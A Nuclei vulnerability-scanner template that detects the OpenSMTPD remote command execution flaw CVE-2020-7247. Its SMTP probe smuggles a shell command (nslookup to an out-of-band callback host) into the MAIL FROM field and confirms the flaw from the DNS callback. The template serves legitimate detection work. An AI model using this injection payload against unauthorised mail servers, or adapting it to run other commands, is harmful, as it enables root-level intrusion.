id: CVE-2020-7247
info:
  name: OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution
  author: princechaddha
  severity: critical
  description: |
    OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
  reference:
    - https://www.openwall.com/lists/oss-security/2020/01/28/3
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7247
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7247
    cwe-id: CWE-78,CWE-755
  tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
network:
  - inputs:
      - read: 1024
      - data: "helo target\r\n"
        read: 1024
      - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
        read: 1024
      - data: "RCPT TO:<root>\r\n"
        read: 1024
      - data: "DATA\r\n"
        read: 1024
      - data: "\r\nxxxx\r\n.\r\n"
        read: 1024
      - data: "QUIT\r\n"
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:25"
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
      - type: word
        part: raw
        words:
          - "Message accepted for delivery"
# Enhanced by mp on 2022/04/29